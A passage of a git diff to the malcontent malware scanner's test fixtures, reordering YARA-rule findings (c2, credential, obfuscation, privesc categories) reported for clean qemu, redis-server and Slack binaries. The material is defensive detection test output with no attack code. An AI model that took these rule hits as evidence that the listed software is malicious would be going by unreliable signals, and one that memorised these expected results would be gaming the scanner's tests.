[/home/linuxbrew/.linuxbrew/opt/lz4/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flz4%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/lzo/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flzo%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/openssl](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fopenssl&type=code)
[/home/linuxbrew/.linuxbrew/opt/vde/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fvde%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/python](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fpython&type=code)
[/home/linuxbrew/.linuxbrew/opt/xz/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxz%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/z3/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fz3%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code)
[/home/linuxbrew/.linuxbrew/opt/gtk](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgtk&type=code) | | LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/tmp](https://github.com/search?q=%2Fvar%2Ftmp&type=code) | | LOW | [fs/permission/chown](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-chown.yara#fchownat) | May change file ownership | [fchownat](https://github.com/search?q=fchownat&type=code) | | LOW | [fs/symlink_resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/symlink-resolve.yara#realpath) | [resolves symbolic links](https://man7.org/linux/man-pages/man3/realpath.3.html) | [realpath](https://github.com/search?q=realpath&type=code) | @@ -100,7 +100,7 @@ | LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | | LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recvmsg) | [receive a message from a socket](https://linux.die.net/man/2/recvmsg) | [recvmsg](https://github.com/search?q=recvmsg&type=code) | | LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [sendmsg](https://github.com/search?q=sendmsg&type=code)
[sendto](https://github.com/search?q=sendto&type=code) | -| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://qemu.org/contribute/report-a-bug](https://qemu.org/contribute/report-a-bug)
[https://wiki.qemu.org/Documentation/9psetup](https://wiki.qemu.org/Documentation/9psetup) | +| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://wiki.qemu.org/Documentation/9psetup](https://wiki.qemu.org/Documentation/9psetup)
[https://qemu.org/contribute/report-a-bug](https://qemu.org/contribute/report-a-bug) | | LOW | [os/fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_wait](https://github.com/search?q=epoll_wait&type=code) | | LOW | [os/kernel/seccomp](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/seccomp.yara#seccomp) | [operate on Secure Computing state of the process](https://man7.org/linux/man-pages/man2/seccomp.2.html) | [seccomp](https://github.com/search?q=seccomp&type=code) | | LOW | [privesc/setuid](https://github.com/chainguard-dev/malcontent/blob/main/rules/privesc/setuid.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | diff --git a/tests/linux/clean/redis-server.aarch64.md b/tests/linux/clean/redis-server.aarch64.md index 7adb4bae3..aa389e67c 100644 --- a/tests/linux/clean/redis-server.aarch64.md +++ b/tests/linux/clean/redis-server.aarch64.md @@ -2,13 +2,13 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--|--|--|--| -| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[bus_port](https://github.com/search?q=bus_port&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[master_port](https://github.com/search?q=master_port&type=code)
[prev_ip](https://github.com/search?q=prev_ip&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[updatePort](https://github.com/search?q=updatePort&type=code) | +| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [master_port](https://github.com/search?q=master_port&type=code)
[updatePort](https://github.com/search?q=updatePort&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[bus_port](https://github.com/search?q=bus_port&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[prev_ip](https://github.com/search?q=prev_ip&type=code)
[IP](https://github.com/search?q=IP&type=code) | | MEDIUM | [crypto/openssl](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/openssl.yara#openssl_user) | Uses OpenSSL | [OpenSSL](https://github.com/search?q=OpenSSL&type=code) | | MEDIUM | [discover/user/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) | -| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [execCommandAbort](https://github.com/search?q=execCommandAbort&type=code)
[replicaStartCommandStream](https://github.com/search?q=replicaStartCommandStream&type=code) | +| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [replicaStartCommandStream](https://github.com/search?q=replicaStartCommandStream&type=code)
[execCommandAbort](https://github.com/search?q=execCommandAbort&type=code) | | MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | | MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execve) | executes external programs | [execve](https://github.com/search?q=execve&type=code) | -| MEDIUM | [exec/shell/echo](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/echo.yara#elf_calls_shell_echo) | [program generates text with echo command](https://linux.die.net/man/1/echo) | [echo 'maxmemory 128mb'](https://github.com/search?q=echo+%27maxmemory+128mb%27&type=code)
[echo madvise > /sys/kernel/mm/transparent_hugepage/enabled' as root](https://github.com/search?q=echo+madvise+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27+as+root&type=code)
[echo never > /sys/kernel/mm/transparent_hugepage/enabled'](https://github.com/search?q=echo+never+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27&type=code)
[echo tsc > /sys/devices/system/clocksource/clocksource0/current_clock](https://github.com/search?q=echo+tsc+%3E+%2Fsys%2Fdevices%2Fsystem%2Fclocksource%2Fclocksource0%2Fcurrent_clock&type=code) | +| MEDIUM | [exec/shell/echo](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/echo.yara#elf_calls_shell_echo) | [program generates text with echo command](https://linux.die.net/man/1/echo) | [echo tsc > /sys/devices/system/clocksource/clocksource0/current_clock](https://github.com/search?q=echo+tsc+%3E+%2Fsys%2Fdevices%2Fsystem%2Fclocksource%2Fclocksource0%2Fcurrent_clock&type=code)
[echo madvise > /sys/kernel/mm/transparent_hugepage/enabled' as root](https://github.com/search?q=echo+madvise+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27+as+root&type=code)
[echo never > /sys/kernel/mm/transparent_hugepage/enabled'](https://github.com/search?q=echo+never+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27&type=code)
[echo 'maxmemory 128mb'](https://github.com/search?q=echo+%27maxmemory+128mb%27&type=code) | | MEDIUM | [fs/file/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-create.yara#CreateFile) | create a new file | [CreateFileEvent](https://github.com/search?q=CreateFileEvent&type=code) | | MEDIUM | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#DeleteFile) | delete a file | [DeleteFileEvent](https://github.com/search?q=DeleteFileEvent&type=code) | | MEDIUM | [fs/file/times_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-times-set.yara#shell_toucher) | change file timestamps | [touch the specified keys](https://github.com/search?q=touch+the+specified+keys&type=code) | @@ -16,10 +16,10 @@ | MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/dump.bin](https://github.com/search?q=%2Ftmp%2Fdump.bin&type=code)
[/tmp/dump.hex](https://github.com/search?q=%2Ftmp%2Fdump.hex&type=code) | | MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) | | MEDIUM | [fs/proc/arbitrary_pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%ld/smaps](https://github.com/search?q=%2Fproc%2F%25ld%2Fsmaps&type=code) | -| MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [RM_SendChildHeartbeat](https://github.com/search?q=RM_SendChildHeartbeat&type=code)
[RedisModule_SendChildHeartbeat](https://github.com/search?q=RedisModule_SendChildHeartbeat&type=code) | +| MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [RedisModule_SendChildHeartbeat](https://github.com/search?q=RedisModule_SendChildHeartbeat&type=code)
[RM_SendChildHeartbeat](https://github.com/search?q=RM_SendChildHeartbeat&type=code) | | MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | | MEDIUM | [net/ip/addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/addr.yara#ip_addr) | mentions an 'IP address' | [IP address](https://github.com/search?q=IP+address&type=code) | -| MEDIUM | [net/ip/host_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/host_port.yara#host_port_ref) | connects to an arbitrary hostname:port | $host_port
[host and port](https://github.com/search?q=host+and+port&type=code)
[host-port](https://github.com/search?q=host-port&type=code)
[hostname and port](https://github.com/search?q=hostname+and+port&type=code) | +| MEDIUM | [net/ip/host_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/host_port.yara#host_port_ref) | connects to an arbitrary hostname:port | [hostname and port](https://github.com/search?q=hostname+and+port&type=code)
[host and port](https://github.com/search?q=host+and+port&type=code)
[host-port](https://github.com/search?q=host-port&type=code)
[host_port](https://github.com/search?q=host_port&type=code) | | MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | | MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntop](https://github.com/search?q=inet_ntop&type=code) | | MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | generic listen string | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | @@ -27,14 +27,14 @@ | MEDIUM | [persist/daemon](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/daemon/daemon.yara#daemon) | Run as a background daemon | [daemonize](https://github.com/search?q=daemonize&type=code) | | MEDIUM | [persist/pid_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file) | pid file, likely DIY daemon | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code)
[createPidFile](https://github.com/search?q=createPidFile&type=code) | | MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | -| MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [Check your memory ASAP !!!](https://github.com/search?q=Check+your+memory+ASAP+%21%21%21&type=code)
[Sentinel was not able to save the new configuration on disk!!!](https://github.com/search?q=Sentinel+was+not+able+to+save+the+new+configuration+on+disk%21%21%21&type=code) | -| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [http://github.com/redis/redis/issues](http://github.com/redis/redis/issues)
[http://pyropus.ca/software/memtester/](http://pyropus.ca/software/memtester/)
[http://www.memtest86.com/](http://www.memtest86.com/)
[https://redis.io/commands/slowlog](https://redis.io/commands/slowlog)
[https://redis.io/topics/latency](https://redis.io/topics/latency) | -| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [http://](http://)
[https://](https://)
[x86](https://github.com/search?q=x86&type=code) | -| LOW | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#os_ref) | references a specific operating system | [Linux](https://github.com/search?q=Linux&type=code)
[http://](http://)
[https://](https://) | -| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [ACLCheckPasswordHash](https://github.com/search?q=ACLCheckPasswordHash&type=code)
[ACLHashPassword](https://github.com/search?q=ACLHashPassword&type=code)
[authentication password for the default](https://github.com/search?q=authentication+password+for+the+default&type=code)
[bit user password](https://github.com/search?q=bit+user+password&type=code)
[checkPasswordBasedAuth](https://github.com/search?q=checkPasswordBasedAuth&type=code)
[for the output password](https://github.com/search?q=for+the+output+password&type=code)
[passwords](https://github.com/search?q=passwords&type=code)
[the number of password](https://github.com/search?q=the+number+of+password&type=code)
[tlsPasswordCallback](https://github.com/search?q=tlsPasswordCallback&type=code)
[username and password](https://github.com/search?q=username+and+password&type=code)
[username-password pair or user is](https://github.com/search?q=username-password+pair+or+user+is&type=code) | +| MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [Sentinel was not able to save the new configuration on disk!!!](https://github.com/search?q=Sentinel+was+not+able+to+save+the+new+configuration+on+disk%21%21%21&type=code)
[Check your memory ASAP !!!](https://github.com/search?q=Check+your+memory+ASAP+%21%21%21&type=code) | +| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [http://pyropus.ca/software/memtester/](http://pyropus.ca/software/memtester/)
[http://github.com/redis/redis/issues](http://github.com/redis/redis/issues)
[https://redis.io/commands/slowlog](https://redis.io/commands/slowlog)
[https://redis.io/topics/latency](https://redis.io/topics/latency)
[http://www.memtest86.com/](http://www.memtest86.com/) | +| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)
[http://](http://)
[x86](https://github.com/search?q=x86&type=code) | +| LOW | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#os_ref) | references a specific operating system | [https://](https://)
[http://](http://)
[Linux](https://github.com/search?q=Linux&type=code) | +| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [authentication password for the default](https://github.com/search?q=authentication+password+for+the+default&type=code)
[username-password pair or user is](https://github.com/search?q=username-password+pair+or+user+is&type=code)
[for the output password](https://github.com/search?q=for+the+output+password&type=code)
[checkPasswordBasedAuth](https://github.com/search?q=checkPasswordBasedAuth&type=code)
[the number of password](https://github.com/search?q=the+number+of+password&type=code)
[username and password](https://github.com/search?q=username+and+password&type=code)
[ACLCheckPasswordHash](https://github.com/search?q=ACLCheckPasswordHash&type=code)
[tlsPasswordCallback](https://github.com/search?q=tlsPasswordCallback&type=code)
[bit user password](https://github.com/search?q=bit+user+password&type=code)
[ACLHashPassword](https://github.com/search?q=ACLHashPassword&type=code)
[passwords](https://github.com/search?q=passwords&type=code) | | LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) | | LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | -| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[environ](https://github.com/search?q=environ&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [environ](https://github.com/search?q=environ&type=code)
[getenv](https://github.com/search?q=getenv&type=code)
[USER](https://github.com/search?q=USER&type=code) | | LOW | [exec/dylib/address_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/address-check.yara#dladdr) | [determine if address belongs to a shared library](https://man7.org/linux/man-pages/man3/dladdr.3.html) | [dladdr](https://github.com/search?q=dladdr&type=code) | | LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | | LOW | [exec/system_controls/systemd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/system_controls/systemd.yara#ref_systemd) | makes references to systemd | [systemd](https://github.com/search?q=systemd&type=code) | @@ -43,16 +43,16 @@ | LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate64](https://github.com/search?q=ftruncate64&type=code) | | LOW | [fs/file/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-write.yara#file_write) | writes to file | [ewriteConfigOverwriteFile](https://github.com/search?q=ewriteConfigOverwriteFile&type=code) | | LOW | [fs/lock_update](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/lock-update.yara#flock) | apply or remove an advisory lock on a file | [flock](https://github.com/search?q=flock&type=code) | -| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | [/etc/myredis.conf](https://github.com/search?q=%2Fetc%2Fmyredis.conf&type=code)
[/etc/rc.local](https://github.com/search?q=%2Fetc%2Frc.local&type=code)
[/etc/redis/](https://github.com/search?q=%2Fetc%2Fredis%2F&type=code)
[/etc/sentinel.conf](https://github.com/search?q=%2Fetc%2Fsentinel.conf&type=code)
[/etc/sysctl.conf](https://github.com/search?q=%2Fetc%2Fsysctl.conf&type=code) | +| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | [/etc/sentinel.conf](https://github.com/search?q=%2Fetc%2Fsentinel.conf&type=code)
[/etc/myredis.conf](https://github.com/search?q=%2Fetc%2Fmyredis.conf&type=code)
[/etc/sysctl.conf](https://github.com/search?q=%2Fetc%2Fsysctl.conf&type=code)
[/etc/rc.local](https://github.com/search?q=%2Fetc%2Frc.local&type=code)
[/etc/redis/](https://github.com/search?q=%2Fetc%2Fredis%2F&type=code) | | LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code) | | LOW | [fs/tempdir/TEMP](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/TEMP.yara#temp) | temp | [getenv](https://github.com/search?q=getenv&type=code)
[temp](https://github.com/search?q=temp&type=code) | | LOW | [fs/tempfile](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempfile.yara#mktemp) | creates temporary files | [temp file](https://github.com/search?q=temp+file&type=code) | | LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | | LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | | LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | -| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recv) | [receive a message to a socket](https://linux.die.net/man/2/recv) | [recv](https://github.com/search?q=recv&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#send) | [send a message to a socket](https://linux.die.net/man/2/send) | [send](https://github.com/search?q=send&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://redis.io/commands/slowlog](https://redis.io/commands/slowlog)
[https://redis.io/topics/latency-monitor.](https://redis.io/topics/latency-monitor.) | +| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recv) | [receive a message to a socket](https://linux.die.net/man/2/recv) | [socket](https://github.com/search?q=socket&type=code)
[recv](https://github.com/search?q=recv&type=code) | +| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#send) | [send a message to a socket](https://linux.die.net/man/2/send) | [socket](https://github.com/search?q=socket&type=code)
[send](https://github.com/search?q=send&type=code) | +| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://redis.io/topics/latency-monitor.](https://redis.io/topics/latency-monitor.)
[https://redis.io/commands/slowlog](https://redis.io/commands/slowlog) | | LOW | [os/fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_create](https://github.com/search?q=epoll_create&type=code)
[epoll_wait](https://github.com/search?q=epoll_wait&type=code) | | LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | diff --git a/tests/linux/clean/slack.md b/tests/linux/clean/slack.md index 89d44ca7c..06d8fe1a9 100644 --- a/tests/linux/clean/slack.md +++ b/tests/linux/clean/slack.md @@ -4,57 +4,57 @@ |--|--|--|--| | MEDIUM | [anti-behavior/LD_DEBUG](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/LD_DEBUG.yara#env_LD_DEBUG) | may check if dynamic linker debugging is enabled | [LD_DEBUG](https://github.com/search?q=LD_DEBUG&type=code) | | MEDIUM | [anti-behavior/LD_PROFILE](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/LD_PROFILE.yara#env_LD_PROFILE) | may check if dynamic linker profiling is enabled | [LD_PROFILE](https://github.com/search?q=LD_PROFILE&type=code) | -| MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | $elf_head | +| MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | | | MEDIUM | [anti-static/obfuscation/hex](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/hex.yara#hex_parse) | converts hex data to ASCII | [Buffer.from(padded, 'hex')](https://github.com/search?q=Buffer.from%28padded%2C+%27hex%27%29&type=code) | -| MEDIUM | [c2/addr/http_dynamic](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/http-dynamic.yara#http_dynamic) | URL that is dynamically generated | [http://%s](http://%s)
[https://%s](https://%s) | -| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[allow_port](https://github.com/search?q=allow_port&type=code)
[any_port](https://github.com/search?q=any_port&type=code)
[basic_port](https://github.com/search?q=basic_port&type=code)
[check_ip](https://github.com/search?q=check_ip&type=code)
[debugPort](https://github.com/search?q=debugPort&type=code)
[defaultPort](https://github.com/search?q=defaultPort&type=code)
[endpoint_port](https://github.com/search?q=endpoint_port&type=code)
[firstIp](https://github.com/search?q=firstIp&type=code)
[hIp](https://github.com/search?q=hIp&type=code)
[hasPort](https://github.com/search?q=hasPort&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[inspectPort](https://github.com/search?q=inspectPort&type=code)
[internalPort](https://github.com/search?q=internalPort&type=code)
[kPort](https://github.com/search?q=kPort&type=code)
[lIp](https://github.com/search?q=lIp&type=code)
[localPort](https://github.com/search?q=localPort&type=code)
[messagePort](https://github.com/search?q=messagePort&type=code)
[message_port](https://github.com/search?q=message_port&type=code)
[midi_port](https://github.com/search?q=midi_port&type=code)
[multi_port](https://github.com/search?q=multi_port&type=code)
[next_port](https://github.com/search?q=next_port&type=code)
[on_ip](https://github.com/search?q=on_ip&type=code)
[origin_port](https://github.com/search?q=origin_port&type=code)
[pIp](https://github.com/search?q=pIp&type=code)
[parentPort](https://github.com/search?q=parentPort&type=code)
[parent_port](https://github.com/search?q=parent_port&type=code)
[peerPort](https://github.com/search?q=peerPort&type=code)
[peer_port](https://github.com/search?q=peer_port&type=code)
[publicPort](https://github.com/search?q=publicPort&type=code)
[public_ip](https://github.com/search?q=public_ip&type=code)
[quic_port](https://github.com/search?q=quic_port&type=code)
[quiche_ip](https://github.com/search?q=quiche_ip&type=code)
[received_ip](https://github.com/search?q=received_ip&type=code)
[relatedPort](https://github.com/search?q=relatedPort&type=code)
[remotePort](https://github.com/search?q=remotePort&type=code)
[requestPort](https://github.com/search?q=requestPort&type=code)
[required_ip](https://github.com/search?q=required_ip&type=code)
[seq_port](https://github.com/search?q=seq_port&type=code)
[serial_port](https://github.com/search?q=serial_port&type=code)
[server_ip](https://github.com/search?q=server_ip&type=code)
[set_port](https://github.com/search?q=set_port&type=code)
[simple_port](https://github.com/search?q=simple_port&type=code)
[sourcePort](https://github.com/search?q=sourcePort&type=code)
[source_port](https://github.com/search?q=source_port&type=code)
[stun_port](https://github.com/search?q=stun_port&type=code)
[target_ip](https://github.com/search?q=target_ip&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[turn_port](https://github.com/search?q=turn_port&type=code)
[udp_port](https://github.com/search?q=udp_port&type=code)
[uv_ip](https://github.com/search?q=uv_ip&type=code)
[validatePort](https://github.com/search?q=validatePort&type=code)
[xIp](https://github.com/search?q=xIp&type=code)
[yoIp](https://github.com/search?q=yoIp&type=code) | +| MEDIUM | [c2/addr/http_dynamic](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/http-dynamic.yara#http_dynamic) | URL that is dynamically generated | [https://%s](https://%s)
